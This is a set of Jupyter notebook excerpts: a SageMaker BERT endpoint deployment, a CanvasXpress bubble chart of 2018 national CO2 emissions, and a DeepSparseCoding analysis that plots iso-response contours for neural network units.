model_registry_package_container = {
"ModelPackageName": model_package_arn,
}
from pprint import pprint
create_model_from_registry_response = sm.create_model(
    ModelName=model_from_registry_name, ExecutionRoleArn=role, PrimaryContainer=model_registry_package_container
)
pprint(create_model_from_registry_response)
model_from_registry_arn = create_model_from_registry_response["ModelArn"]
model_from_registry_arn
endpoint_config_name = "bert-model-from-registry-epc-{}".format(timestamp)
print(endpoint_config_name)
create_endpoint_config_response = sm.create_endpoint_config(
EndpointConfigName=endpoint_config_name,
ProductionVariants=[
{
"InstanceType": "ml.m4.xlarge",
"InitialVariantWeight": 1,
"InitialInstanceCount": 1,
"ModelName": model_name,
"VariantName": "AllTraffic",
}
],
)
pipeline_endpoint_name = "bert-model-from-registry-ep-{}".format(timestamp)
print("EndpointName={}".format(pipeline_endpoint_name))
# create_endpoint_response = sm.create_endpoint(
# EndpointName=pipeline_endpoint_name, EndpointConfigName=endpoint_config_name
# )
# print(create_endpoint_response["EndpointArn"])
# from IPython.core.display import display, HTML
# display(
# HTML(
# '<b>Review <a target="blank" href="https://console.aws.amazon.com/sagemaker/home?region={}#/endpoints/{}">SageMaker REST Endpoint</a></b>'.format(
# region, pipeline_endpoint_name
# )
# )
# )
%store pipeline_endpoint_name
```
# _Wait Until the Endpoint is Deployed_
```
# %%time
# waiter = sm.get_waiter("endpoint_in_service")
# waiter.wait(EndpointName=pipeline_endpoint_name)
```
# Predict the star_rating with Ad Hoc review_body Samples
```
# import json
# from sagemaker.tensorflow.model import TensorFlowPredictor
# from sagemaker.serializers import JSONLinesSerializer
# from sagemaker.deserializers import JSONLinesDeserializer
# predictor = TensorFlowPredictor(
# endpoint_name=pipeline_endpoint_name,
# sagemaker_session=sess,
# model_name="saved_model",
# model_version=0,
# accept_type="application/jsonlines",
# serializer=JSONLinesSerializer(),
# deserializer=JSONLinesDeserializer(),
# )
# inputs = [{"features": ["This is great!"]}, {"features": ["This is bad."]}]
# predicted_classes = predictor.predict(inputs)
# for predicted_class in predicted_classes:
# print("Predicted star_rating: {}".format(predicted_class))
```
# Release Resources
```
# sm.delete_endpoint(
# EndpointName=pipeline_endpoint_name
# )
%%html
<p><b>Shutting down your kernel for this notebook to release resources.</b></p>
<button class="sm-command-button" data-commandlinker-command="kernelmenu:shutdown" style="display:none;">Shutdown Kernel</button>
<script>
try {
els = document.getElementsByClassName("sm-command-button");
els[0].click();
}
catch(err) {
// NoOp
}
</script>
```
|
github_jupyter
|
# Example: CanvasXpress bubble Chart No. 4
This example page demonstrates how to use the Python package to create a chart that matches the CanvasXpress online example located at:
https://www.canvasxpress.org/examples/bubble-4.html
This example is generated using the reproducible JSON obtained from the above page and the `canvasxpress.util.generator.generate_canvasxpress_code_from_json_file()` function.
Everything required for the chart to render is included in the code below. Simply run the code block.
```
from canvasxpress.canvas import CanvasXpress
from canvasxpress.js.collection import CXEvents
from canvasxpress.render.jupyter import CXNoteBook
cx = CanvasXpress(
render_to="bubble4",
data={
"y": {
"vars": [
"CO2"
],
"smps": [
"AFG",
"ALB",
"DZA",
"AND",
"AGO",
"AIA",
"ATG",
"ARG",
"ARM",
"ABW",
"AUS",
"AUT",
"AZE",
"BHS",
"BHR",
"BGD",
"BRB",
"BLR",
"BEL",
"BLZ",
"BEN",
"BMU",
"BTN",
"BOL",
"BIH",
"BWA",
"BRA",
"VGB",
"BRN",
"BGR",
"BFA",
"BDI",
"KHM",
"CMR",
"CAN",
"CPV",
"CAF",
"TCD",
"CHL",
"CHN",
"COL",
"COM",
"COG",
"COK",
"CRI",
"HRV",
"CUB",
"CYP",
"CZE",
"COD",
"DNK",
"DJI",
"DOM",
"ECU",
"EGY",
"SLV",
"GNQ",
"ERI",
"EST",
"ETH",
"FJI",
"FIN",
"FRA",
"PYF",
"GAB",
"GMB",
"GEO",
"DEU",
"GHA",
"GRC",
"GRL",
"GRD",
"GTM",
"GIN",
"GNB",
"GUY",
"HTI",
"HND",
"HKG",
"HUN",
"ISL",
"IND",
"IDN",
"IRN",
"IRQ",
"IRL",
"ISR",
"ITA",
"JAM",
"JPN",
"JOR",
"KAZ",
"KEN",
"KIR",
"KWT",
"KGZ",
"LAO",
"LVA",
"LBN",
"LSO",
"LBR",
"LBY",
"LIE",
"LTU",
"LUX",
"MAC",
"MDG",
"MWI",
"MYS",
"MDV",
"MLI",
"MLT",
"MHL",
"MRT",
"MUS",
"MEX",
"MDA",
"MNG",
"MNE",
"MAR",
"MOZ",
"MMR",
"NAM",
"NRU",
"NPL",
"NLD",
"NCL",
"NZL",
"NIC",
"NER",
"NGA",
"NIU",
"PRK",
"MKD",
"NOR",
"OMN",
"PAK",
"PAN",
"PNG",
"PRY",
"PER",
"PHL",
"POL",
"PRT",
"QAT",
"ROU",
"RUS",
"RWA",
"SHN",
"KNA",
"LCA",
"SPM",
"VCT",
"WSM",
"STP",
"SAU",
"SRB",
"SYC",
"SLE",
"SGP",
"SVK",
"SVN",
"SLB",
"SOM",
"KOR",
"SSD",
"ESP",
"LKA",
"SDN",
"SUR",
"SWE",
"CHE",
"SYR",
"TWN",
"TJK",
"TZA",
"THA",
"TLS",
"TGO",
"TON",
"TTO",
"TUN",
"TUR",
"TKM",
"TUV",
"UGA",
"UKR",
"ARE",
"GBR",
"USA",
"URY",
"UZB",
"VUT",
"VEN",
"VNM",
"YEM",
"ZMB",
"ZWE"
],
"data": [
[
10.452666,
5.402999,
164.309295,
0.46421,
37.678605,
0.147145,
0.505574,
185.029897,
6.296603,
0.943234,
415.953947,
66.719678,
37.488394,
2.03001,
31.594487,
85.718805,
1.207134,
61.871676,
100.207836,
0.612205,
7.759753,
0.648945,
1.662172,
22.345503,
22.086102,
6.815418,
466.649304,
0.173555,
9.560399,
43.551599,
4.140342,
0.568028,
15.479031,
7.566796,
586.504635,
0.609509,
0.300478,
1.008035,
85.829114,
9956.568523,
92.228209,
0.245927,
3.518309,
0.072706,
8.249118,
17.718646,
26.084446,
7.332762,
104.411211,
2.231343,
34.65143,
0.389975,
25.305221,
41.817989,
251.460913,
6.018265,
5.90578,
0.708769,
17.710953,
16.184949,
2.123769,
45.849349,
331.725446,
0.780633,
4.803117,
0.56324,
9.862173,
755.362342,
14.479998,
71.797869,
0.511728,
0.278597,
19.411335,
3.032114,
0.308612,
2.342628,
3.366964,
10.470701,
42.505723,
49.628491,
3.674529,
2591.323739,
576.58439,
755.402186,
211.270294,
38.803394,
62.212641,
348.085029,
8.009662,
1135.688,
24.923803,
319.647412,
17.136703,
0.068879,
104.217567,
10.16888,
32.26245,
7.859287,
27.565431,
2.425558,
1.27446,
45.205986,
0.14375,
13.669492,
9.56852,
2.216456,
4.187806,
1.470252,
249.144498,
1.565092,
3.273276,
1.531581,
0.153065,
3.934804,
4.901611,
451.080829,
5.877784,
64.508256,
2.123147,
65.367444,
8.383478,
26.095603,
4.154302,
0.049746,
13.410432,
160.170147,
8.20904,
35.080341,
5.377193,
2.093847,
136.078346,
0.007653,
38.162935,
6.980909,
43.817657,
71.029916,
247.425382,
12.096333,
6.786146,
8.103032,
54.210259,
138.924391,
337.705742,
51.482481,
109.24468,
76.951219,
1691.360426,
1.080098,
0.011319,
0.249014,
0.362202,
0.079232,
0.264106,
0.267864,
0.126126,
576.757836,
46.0531,
0.60536,
0.987559,
38.28806,
36.087837,
14.487844,
0.298477,
0.658329,
634.934068,
1.539884,
269.654254,
22.973233,
22.372399,
2.551817,
41.766183,
36.895485,
25.877689,
273.104667,
7.473265,
11.501889,
292.452995,
0.520422,
3.167303,
0.164545,
37.865571,
30.357093,
419.194747,
78.034724,
0.01148,
5.384767,
231.694165,
188.541366,
380.138559,
5424.881502,
6.251839,
113.93837,
0.145412,
129.596274,
211.774129,
9.945288,
6.930094,
11.340575
]
]
},
"x": {
"Country": [
"Afghanistan",
"Albania",
"Algeria",
"Andorra",
"Angola",
"Anguilla",
"Antigua and Barbuda",
"Argentina",
"Armenia",
"Aruba",
"Australia",
"Austria",
"Azerbaijan",
"Bahamas",
"Bahrain",
"Bangladesh",
"Barbados",
"Belarus",
"Belgium",
"Belize",
"Benin",
"Bermuda",
"Bhutan",
"Bolivia",
"Bosnia and Herzegovina",
"Botswana",
"Brazil",
"British Virgin Islands",
"Brunei",
"Bulgaria",
"Burkina Faso",
"Burundi",
"Cambodia",
"Cameroon",
"Canada",
"Cape Verde",
"Central African Republic",
"Chad",
"Chile",
"China",
"Colombia",
"Comoros",
"Congo",
"Cook Islands",
"Costa Rica",
"Croatia",
"Cuba",
"Cyprus",
"Czechia",
"Democratic Republic of Congo",
"Denmark",
"Djibouti",
"Dominican Republic",
"Ecuador",
"Egypt",
"El Salvador",
"Equatorial Guinea",
"Eritrea",
"Estonia",
"Ethiopia",
"Fiji",
"Finland",
"France",
"French Polynesia",
"Gabon",
"Gambia",
"Georgia",
"Germany",
"Ghana",
"Greece",
"Greenland",
"Grenada",
"Guatemala",
"Guinea",
"Guinea-Bissau",
"Guyana",
"Haiti",
"Honduras",
"Hong Kong",
"Hungary",
"Iceland",
"India",
"Indonesia",
"Iran",
"Iraq",
"Ireland",
"Israel",
"Italy",
"Jamaica",
"Japan",
"Jordan",
"Kazakhstan",
"Kenya",
"Kiribati",
"Kuwait",
"Kyrgyzstan",
"Laos",
"Latvia",
"Lebanon",
"Lesotho",
"Liberia",
"Libya",
"Liechtenstein",
"Lithuania",
"Luxembourg",
"Macao",
"Madagascar",
"Malawi",
"Malaysia",
"Maldives",
"Mali",
"Malta",
"Marshall Islands",
"Mauritania",
"Mauritius",
"Mexico",
"Moldova",
"Mongolia",
"Montenegro",
"Morocco",
"Mozambique",
"Myanmar",
"Namibia",
"Nauru",
"Nepal",
"Netherlands",
"New Caledonia",
"New Zealand",
"Nicaragua",
"Niger",
"Nigeria",
"Niue",
"North Korea",
"North Macedonia",
"Norway",
"Oman",
"Pakistan",
"Panama",
"Papua New Guinea",
"Paraguay",
"Peru",
"Philippines",
"Poland",
"Portugal",
"Qatar",
"Romania",
"Russia",
"Rwanda",
"Saint Helena",
"Saint Kitts and Nevis",
"Saint Lucia",
"Saint Pierre and Miquelon",
"Saint Vincent and the Grenadines",
"Samoa",
"Sao Tome and Principe",
"Saudi Arabia",
"Serbia",
"Seychelles",
"Sierra Leone",
"Singapore",
"Slovakia",
"Slovenia",
"Solomon Islands",
"Somalia",
"South Korea",
"South Sudan",
"Spain",
"Sri Lanka",
"Sudan",
"Suriname",
"Sweden",
"Switzerland",
"Syria",
"Taiwan",
"Tajikistan",
"Tanzania",
"Thailand",
"Timor",
"Togo",
"Tonga",
"Trinidad and Tobago",
"Tunisia",
"Turkey",
"Turkmenistan",
"Tuvalu",
"Uganda",
"Ukraine",
"United Arab Emirates",
"United Kingdom",
"United States",
"Uruguay",
"Uzbekistan",
"Vanuatu",
"Venezuela",
"Vietnam",
"Yemen",
"Zambia",
"Zimbabwe"
],
"Continent": [
"Asia",
"Europe",
"Africa",
"Europe",
"Africa",
"North America",
"North America",
"South America",
"Asia",
"North America",
"Oceania",
"Europe",
"Europe",
"North America",
"Asia",
"Asia",
"North America",
"Europe",
"Europe",
"North America",
"Africa",
"North America",
"Asia",
"South America",
"Europe",
"Africa",
"South America",
"North America",
"Asia",
"Europe",
"Africa",
"Africa",
"Asia",
"Africa",
"North America",
"Africa",
"Africa",
"Africa",
"South America",
"Asia",
"South America",
"Africa",
"Africa",
"Oceania",
"Central America",
"Europe",
"North America",
"Europe",
"Europe",
"Africa",
"Europe",
"Africa",
"North America",
"South America",
"Africa",
"Central America",
"Africa",
"Africa",
"Europe",
"Africa",
"Oceania",
"Europe",
"Europe",
"Oceania",
"Africa",
"Africa",
"Asia",
"Europe",
"Africa",
"Europe",
"North America",
"North America",
"Central America",
"Africa",
"Africa",
"South America",
"North America",
"Central America",
"Asia",
"Europe",
"Europe",
"Asia",
"Asia",
"Asia",
"Asia",
"Europe",
"Asia",
"Europe",
"North America",
"Asia",
"Asia",
"Asia",
"Africa",
"Oceania",
"Asia",
"Asia",
"Asia",
"Europe",
"Asia",
"Africa",
"Africa",
"Africa",
"Europe",
"Europe",
"Europe",
"Asia",
"Africa",
"Africa",
"Asia",
"Asia",
"Africa",
"Europe",
"Oceania",
"Africa",
"Africa",
"North America",
"Europe",
"Asia",
"Europe",
"Africa",
"Africa",
"Asia",
"Africa",
"Oceania",
"Asia",
"Europe",
"Oceania",
"Oceania",
"Central America",
"Africa",
"Africa",
"Oceania",
"Asia",
"Europe",
"Europe",
"Asia",
"Asia",
"Central America",
"Oceania",
"South America",
"South America",
"Asia",
"Europe",
"Europe",
"Africa",
"Europe",
"Asia",
"Africa",
"Africa",
"North America",
"North America",
"North America",
"North America",
"Oceania",
"Africa",
"Asia",
"Europe",
"Africa",
"Africa",
"Asia",
"Europe",
"Europe",
"Oceania",
"Africa",
"Asia",
"Africa",
"Europe",
"Asia",
"Africa",
"South America",
"Europe",
"Europe",
"Asia",
"Asia",
"Asia",
"Africa",
"Asia",
"Asia",
"Africa",
"Oceania",
"North America",
"Africa",
"Asia",
"Asia",
"Oceania",
"Africa",
"Europe",
"Asia",
"Europe",
"North America",
"South America",
"Asia",
"Oceania",
"South America",
"Asia",
"Asia",
"Africa",
"Africa"
]
}
},
config={
"circularType": "bubble",
"colorBy": "Continent",
"graphType": "Circular",
"hierarchy": [
"Continent",
"Country"
],
"theme": "paulTol",
"title": "Annual CO2 Emmisions in 2018"
},
width=613,
height=613,
events=CXEvents(),
after_render=[],
other_init_params={
"version": 35,
"events": False,
"info": False,
"afterRenderInit": False,
"noValidate": True
}
)
display = CXNoteBook(cx)
display.render(output_file="bubble_4.html")
```
## Imports
```
import os
import sys
%env CUDA_VISIBLE_DEVICES=0
%matplotlib inline
import pickle
import numpy as np
import matplotlib
import matplotlib.pyplot as plt
import matplotlib.gridspec as gridspec
from matplotlib.ticker import FormatStrFormatter
import tensorflow as tf
root_path = os.path.dirname(os.path.dirname(os.path.dirname(os.getcwd())))
if root_path not in sys.path: sys.path.append(root_path)
from DeepSparseCoding.tf1x.data.dataset import Dataset
import DeepSparseCoding.tf1x.data.data_selector as ds
import DeepSparseCoding.tf1x.utils.data_processing as dp
import DeepSparseCoding.tf1x.utils.plot_functions as pf
import DeepSparseCoding.tf1x.analysis.analysis_picker as ap
class lambda_params(object):
def __init__(self, lamb=None):
self.model_type = "lambda"
self.model_name = "lambda_mnist"
self.version = "0.0"
self.save_info = "analysis_test_carlini_targeted"
self.overwrite_analysis_log = False
self.activation_function = lamb
class mlp_params(object):
def __init__(self):
self.model_type = "mlp"
self.model_name = "mlp_mnist"
self.version = "0.0"
self.save_info = "analysis_test_carlini_targeted"
self.overwrite_analysis_log = False
class lca_512_params(object):
def __init__(self):
self.model_type = "lca"
self.model_name = "lca_512_vh"
self.version = "0.0"
self.save_info = "analysis_train_carlini_targeted"
self.overwrite_analysis_log = False
class lca_768_params(object):
def __init__(self):
self.model_type = "lca"
self.model_name = "lca_768_mnist"
self.version = "0.0"
#self.save_info = "analysis_train_carlini_targeted" # for vh
self.save_info = "analysis_test_carlini_targeted" # for mnist
self.overwrite_analysis_log = False
class lca_1024_params(object):
def __init__(self):
self.model_type = "lca"
self.model_name = "lca_1024_vh"
self.version = "0.0"
self.save_info = "analysis_train_carlini_targeted"
self.overwrite_analysis_log = False
class lca_1536_params(object):
def __init__(self):
self.model_type = "lca"
self.model_name = "lca_1536_mnist"
self.version = "0.0"
self.save_info = "analysis_test_carlini_targeted"
self.overwrite_analysis_log = False
class ae_deep_params(object):
def __init__(self):
self.model_type = "ae"
self.model_name = "ae_deep_mnist"
self.version = "0.0"
self.save_info = "analysis_test_carlini_targeted"
self.overwrite_analysis_log = False
lamb = lambda x : tf.reduce_sum(tf.square(x), axis=1, keepdims=True)
#lamb = lambda x : x / tf.reduce_sum(tf.square(x), axis=1, keepdims=True)
params_list = [ae_deep_params()]#lca_768_params(), lca_1536_params()]
for params in params_list:
params.model_dir = (os.path.expanduser("~")+"/Work/Projects/"+params.model_name)
analyzer_list = [ap.get_analyzer(params.model_type) for params in params_list]
for analyzer, params in zip(analyzer_list, params_list):
analyzer.setup(params)
if(hasattr(params, "activation_function")):
analyzer.model_params.activation_function = params.activation_function
analyzer.setup_model(analyzer.model_params)
analyzer.load_analysis(save_info=params.save_info)
analyzer.model_name = params.model_name
for analyzer in analyzer_list:
if(analyzer.analysis_params.model_type.lower() != "lca"
and analyzer.analysis_params.model_type.lower() != "lambda"):
pre_images = np.stack([analyzer.neuron_vis_output["optimal_stims"][target_id][-1].reshape(28,28)
for target_id in range(len(analyzer.analysis_params.neuron_vis_targets))], axis=0)
pre_image_fig = pf.plot_weights(pre_images, title=analyzer.model_name+" pre-images", figsize=(4,8))
pre_image_fig.savefig(analyzer.analysis_out_dir+"/vis/pre_images.png", transparent=True,
bbox_inches="tight", pad_inches=0.01)
#available_indices = [ 30, 45, 101, 223, 283, 335, 388, 491, 558, 571, 572,
# 590, 599, 606, 619, 629, 641, 652, 693, 722, 724, 749,
# 769, 787, 812, 819, 824, 906, 914, 927, 987, 1134, 1186,
# 1196, 1297, 1376, 1409, 1534]
#available_indices = np.array(range(analyzer.model.get_num_latent()))
available_indices = [2, 6, 8, 18, 21, 26]
step_idx = -1
for analyzer in analyzer_list:
analyzer.available_indices = available_indices#np.array(range(analyzer.model.get_num_latent()))
analyzer.target_neuron_idx = analyzer.available_indices[0]
if(analyzer.analysis_params.model_type.lower() == "lca"):
bf0 = analyzer.bf_stats["basis_functions"][analyzer.target_neuron_idx]
else:
bf0 = analyzer.neuron_vis_output["optimal_stims"][analyzer.target_neuron_idx][step_idx]
bf0 = bf0.reshape(np.prod(analyzer.model.get_input_shape()[1:]))
bf0 = bf0 / np.linalg.norm(bf0)
fig, axes = plt.subplots(1, 2, figsize=(10,4))
ax = pf.clear_axis(axes[0])
ax.imshow(bf0.reshape(int(np.sqrt(bf0.size)), int(np.sqrt(bf0.size))), cmap="Greys_r")#, vmin=0.0, vmax=1.0)
ax.set_title("Optimal\ninput image")
if(analyzer.analysis_params.model_type.lower() != "lca"):
axes[1].plot(analyzer.neuron_vis_output["loss"][analyzer.target_neuron_idx])
axes[1].set_title("Optimization loss")
plt.show()
def find_orth_vect(matrix):
rand_vect = np.random.rand(matrix.shape[0], 1)
new_matrix = np.hstack((matrix, rand_vect))
candidate_vect = np.zeros(matrix.shape[1]+1)
candidate_vect[-1] = 1
orth_vect = np.linalg.lstsq(new_matrix.T, candidate_vect, rcond=None)[0] # [0] indexes lst-sqrs solution
orth_vect = np.squeeze((orth_vect / np.linalg.norm(orth_vect)).T)
return orth_vect
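# Illustrative sanity check (not part of the original analysis) of the
# least-squares trick above: appending a random column and solving for the
# target vector [0, ..., 0, 1] yields a vector that is orthogonal to every
# original column while remaining non-degenerate.
_M = np.random.RandomState(0).rand(10, 3)
_aug = np.hstack((_M, np.random.RandomState(1).rand(10, 1)))
_rhs = np.zeros(4)
_rhs[-1] = 1.0
_v = np.linalg.lstsq(_aug.T, _rhs, rcond=None)[0]
_v = _v / np.linalg.norm(_v)
assert np.allclose(_M.T @ _v, 0, atol=1e-8)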
def get_rand_vectors(bf0, num_orth_directions):
rand_vectors = bf0.T[:,None] # matrix of alternate vectors
for orth_idx in range(num_orth_directions):
tmp_bf1 = find_orth_vect(rand_vectors)
rand_vectors = np.append(rand_vectors, tmp_bf1[:,None], axis=1)
return rand_vectors.T[1:, :] # [num_vectors, vector_length]
def get_alt_vectors(bf0, bf1s):
alt_vectors = bf0.T[:,None] # matrix of alternate vectors
for tmp_bf1 in bf1s:
tmp_bf1 = np.squeeze((tmp_bf1 / np.linalg.norm(tmp_bf1)).T)
alt_vectors = np.append(alt_vectors, tmp_bf1[:,None], axis=1)
return alt_vectors.T[1:, :] # [num_vectors, vector_length]
def get_norm_activity(analyzer, neuron_id_list, stim0_list, stim1_list, num_imgs):
# Construct point dataset
#x_pts = np.linspace(-0.5, 19.5, int(np.sqrt(num_imgs)))
#y_pts = np.linspace(-10.0, 10.0, int(np.sqrt(num_imgs)))
x_pts = np.linspace(-0.5, 3.5, int(np.sqrt(num_imgs)))
y_pts = np.linspace(-2.0, 2.0, int(np.sqrt(num_imgs)))
#x_pts = np.linspace(0.9, 1.1, int(np.sqrt(num_imgs)))
#y_pts = np.linspace(-0.1, 0.1, int(np.sqrt(num_imgs)))
#x_pts = np.linspace(0.999, 1.001, int(np.sqrt(num_imgs)))
#y_pts = np.linspace(-0.001, 0.001, int(np.sqrt(num_imgs)))
X_mesh, Y_mesh = np.meshgrid(x_pts, y_pts)
proj_datapoints = np.stack([X_mesh.reshape(num_imgs), Y_mesh.reshape(num_imgs)], axis=1)
out_dict = {
"norm_activity": [],
"proj_neuron0": [],
"proj_neuron1": [],
"proj_v": [],
"v": [],
"proj_datapoints": proj_datapoints,
"X_mesh": X_mesh,
"Y_mesh": Y_mesh}
# TODO: This can be made to be much faster by compiling all of the stimulus into a single set and computing activations
for neuron_id, stim0 in zip(neuron_id_list, stim0_list):
activity_sub_list = []
proj_neuron0_sub_list = []
proj_neuron1_sub_list = []
proj_v_sub_list = []
v_sub_list = []
for stim1 in stim1_list:
proj_matrix, v = dp.bf_projections(stim0, stim1)
proj_neuron0_sub_list.append(np.dot(proj_matrix, stim0).T) #project
proj_neuron1_sub_list.append(np.dot(proj_matrix, stim1).T) #project
proj_v_sub_list.append(np.dot(proj_matrix, v).T) #project
v_sub_list.append(v)
datapoints = np.stack([np.dot(proj_matrix.T, proj_datapoints[data_id,:])
for data_id in range(num_imgs)], axis=0) #inject
datapoints = dp.reshape_data(datapoints, flatten=False)[0]
datapoints = {"test": Dataset(datapoints, lbls=None, ignore_lbls=None, rand_state=analyzer.rand_state)}
datapoints = analyzer.model.reshape_dataset(datapoints, analyzer.model_params)
activations = analyzer.compute_activations(datapoints["test"].images)#, batch_size=int(np.sqrt(num_imgs)))
activations = activations[:, neuron_id]
activity_max = np.amax(np.abs(activations))
activations = activations / (activity_max + 0.00001)
activations = activations.reshape(int(np.sqrt(num_imgs)), int(np.sqrt(num_imgs)))
activity_sub_list.append(activations)
out_dict["norm_activity"].append(activity_sub_list)
out_dict["proj_neuron0"].append(proj_neuron0_sub_list)
out_dict["proj_neuron1"].append(proj_neuron1_sub_list)
out_dict["proj_v"].append(proj_v_sub_list)
out_dict["v"].append(v_sub_list)
return out_dict
analyzer = analyzer_list[0]
step_idx = -1
num_imgs = int(300**2)#int(228**2)
min_angle = 10
use_rand_orth = False
num_neurons = 2#1
if(use_rand_orth):
target_neuron_indices = np.random.choice(analyzer.available_indices, num_neurons, replace=False)
alt_stim_list = get_rand_vectors(stim0, num_neurons)
else:
if(analyzer.analysis_params.model_type.lower() == "lca"):
target_neuron_indices = np.random.choice(analyzer.available_indices, num_neurons, replace=False)
analyzer.neuron_angles = analyzer.get_neuron_angles(analyzer.bf_stats)[1] * (180/np.pi)
alt_stim_list = []
else:
all_neuron_indices = np.random.choice(analyzer.available_indices, 2*num_neurons, replace=False)
target_neuron_indices = all_neuron_indices[:num_neurons]
orth_neuron_indices = all_neuron_indices[num_neurons:]
if(analyzer.analysis_params.model_type.lower() == "ae"):
neuron_vis_targets = np.array(analyzer.analysis_params.neuron_vis_targets)
neuron_id_list = neuron_vis_targets[target_neuron_indices]
else:
neuron_id_list = target_neuron_indices
stim0_list = []
stimid0_list = []
for neuron_id in target_neuron_indices:
if(analyzer.analysis_params.model_type.lower() == "lca"):
stim0 = analyzer.bf_stats["basis_functions"][neuron_id]
else:
stim0 = analyzer.neuron_vis_output["optimal_stims"][neuron_id][step_idx]
stim0 = stim0.reshape(np.prod(analyzer.model.get_input_shape()[1:])) # shape=[784]
stim0 = stim0 / np.linalg.norm(stim0) # normalize length
stim0_list.append(stim0)
stimid0_list.append(neuron_id)
if not use_rand_orth:
if(analyzer.analysis_params.model_type.lower() == "lca"):
gt_min_angle_indices = np.argwhere(analyzer.neuron_angles[neuron_id, :] > min_angle)
sorted_angle_indices = np.argsort(analyzer.neuron_angles[neuron_id, gt_min_angle_indices], axis=0)
vector_id = gt_min_angle_indices[sorted_angle_indices[0]].item()
alt_stim = analyzer.bf_stats["basis_functions"][vector_id]
alt_stim = [np.squeeze(alt_stim.reshape(analyzer.model_params.num_pixels))]
comparison_vector = get_alt_vectors(stim0, alt_stim)[0]
alt_stim_list.append(comparison_vector)
else:
alt_stims = [analyzer.neuron_vis_output["optimal_stims"][orth_neuron_idx][step_idx]
for orth_neuron_idx in orth_neuron_indices]
alt_stim_list = get_alt_vectors(stim0, alt_stims)
```
```
out_dict = get_norm_activity(analyzer, neuron_id_list, stim0_list, alt_stim_list, num_imgs)
num_plots_y = num_neurons + 1 # extra dimension for example image
num_plots_x = num_neurons + 1 # extra dimension for example image
gs0 = gridspec.GridSpec(num_plots_y, num_plots_x, wspace=0.1, hspace=0.1)
fig = plt.figure(figsize=(10, 10))
cmap = plt.get_cmap('viridis')
orth_vectors = []
for neuron_loop_index in range(num_neurons): # rows
for orth_loop_index in range(num_neurons): # columns
norm_activity = out_dict["norm_activity"][neuron_loop_index][orth_loop_index]
proj_neuron0 = out_dict["proj_neuron0"][neuron_loop_index][orth_loop_index]
proj_neuron1 = out_dict["proj_neuron1"][neuron_loop_index][orth_loop_index]
proj_v = out_dict["proj_v"][neuron_loop_index][orth_loop_index]
orth_vectors.append(out_dict["v"][neuron_loop_index][orth_loop_index])
curve_plot_y_idx = neuron_loop_index + 1
curve_plot_x_idx = orth_loop_index + 1
curve_ax = pf.clear_axis(fig.add_subplot(gs0[curve_plot_y_idx, curve_plot_x_idx]))
# NOTE: each subplot has a renormalized color scale
# TODO: Add scale bar like in the lca inference plots
vmin = np.min(norm_activity)
vmax = np.max(norm_activity)
levels = 5
contsf = curve_ax.contourf(out_dict["X_mesh"], out_dict["Y_mesh"], norm_activity,
levels=levels, vmin=vmin, vmax=vmax, alpha=1.0, antialiased=True, cmap=cmap)
curve_ax.arrow(0, 0, proj_neuron0[0].item(), proj_neuron0[1].item(),
width=0.05, head_width=0.15, head_length=0.15, fc='r', ec='r')
curve_ax.arrow(0, 0, proj_neuron1[0].item(), proj_neuron1[1].item(),
width=0.05, head_width=0.15, head_length=0.15, fc='w', ec='w')
curve_ax.arrow(0, 0, proj_v[0].item(), proj_v[1].item(),
width=0.05, head_width=0.15, head_length=0.15, fc='k', ec='k')
#curve_ax.arrow(0, 0, proj_neuron0[0].item(), proj_neuron0[1].item(),
# width=0.05, head_width=0.15, head_length=0.15, fc='r', ec='r')
#curve_ax.arrow(0, 0, proj_neuron1[0].item(), proj_neuron1[1].item(),
# width=0.005, head_width=0.15, head_length=0.15, fc='w', ec='w')
#curve_ax.arrow(0, 0, proj_v[0].item(), proj_v[1].item(),
# width=0.05, head_width=0.05, head_length=0.15, fc='k', ec='k')
#curve_ax.set_xlim([-0.5, 19.5])
#curve_ax.set_ylim([-10, 10.0])
curve_ax.set_xlim([-0.5, 3.5])
curve_ax.set_ylim([-2, 2.0])
#curve_ax.set_xlim([0.999, 1.001])
#curve_ax.set_ylim([-0.001, 0.001])
for plot_y_id in range(num_plots_y):
for plot_x_id in range(num_plots_x):
if plot_y_id > 0 and plot_x_id == 0:
bf_ax = pf.clear_axis(fig.add_subplot(gs0[plot_y_id, plot_x_id]))
bf_resh = stim0_list[plot_y_id-1].reshape((int(np.sqrt(np.prod(analyzer.model.params.data_shape))),
int(np.sqrt(np.prod(analyzer.model.params.data_shape)))))
bf_ax.imshow(bf_resh, cmap="Greys_r")
if plot_y_id == 1:
bf_ax.set_title("Target vectors", color="r", fontsize=16)
if plot_y_id == 0 and plot_x_id > 0:
#comparison_img = comparison_vectors[plot_x_id-1, :].reshape(int(np.sqrt(np.prod(analyzer.model.params.data_shape))),
# int(np.sqrt(np.prod(analyzer.model.params.data_shape))))
orth_img = orth_vectors[plot_x_id-1].reshape(int(np.sqrt(np.prod(analyzer.model.params.data_shape))),
int(np.sqrt(np.prod(analyzer.model.params.data_shape))))
orth_ax = pf.clear_axis(fig.add_subplot(gs0[plot_y_id, plot_x_id]))
orth_ax.imshow(orth_img, cmap="Greys_r")
if plot_x_id == 1:
#orth_ax.set_ylabel("Orthogonal vectors", color="k", fontsize=16)
orth_ax.set_title("Orthogonal vectors", color="k", fontsize=16)
plt.show()
fig.savefig(analyzer.analysis_out_dir+"/vis/iso_contour_grid_04.png")
```
### Curvature comparisons
```
id_list = [1, 1]#, 3]
for analyzer, list_index in zip(analyzer_list, id_list):
analyzer.bf0 = stim0_list[list_index]
analyzer.bf_id0 = stimid0_list[list_index]
analyzer.bf0_slice_scale = 0.80 # fraction in [0, 1) along the slice axis
"""
* Compute a unit vector that is in the same plane as a given basis function pair (B1,B2) and
is orthogonal to B1, where B1 is the target basis for comparison and B2 is selected from all other bases.
* Construct a line of data points in this plane
* Project the data points into image space, compute activations, plot activations
"""
for analyzer in analyzer_list:
analyzer.pop_num_imgs = 100
#orthogonal_list = [idx for idx in range(analyzer.bf_stats["num_outputs"])]
orthogonal_list = [idx for idx in range(analyzer.bf_stats["num_outputs"]) if idx != analyzer.bf_id0]
analyzer.num_orthogonal = len(orthogonal_list)
pop_x_pts = np.linspace(-2.0, 2.0, int(analyzer.pop_num_imgs))
pop_y_pts = np.linspace(-2.0, 2.0, int(analyzer.pop_num_imgs))
pop_X, pop_Y = np.meshgrid(pop_x_pts, pop_y_pts)
full_pop_proj_datapoints = np.stack([pop_X.reshape(analyzer.pop_num_imgs**2),
pop_Y.reshape(analyzer.pop_num_imgs**2)], axis=1) # construct a grid
# find a location to take a slice
# to avoid having to exactly find a point we use a relative position
x_target = pop_x_pts[int(analyzer.bf0_slice_scale*analyzer.pop_num_imgs)]
slice_indices = np.where(full_pop_proj_datapoints[:,0]==x_target)[0]
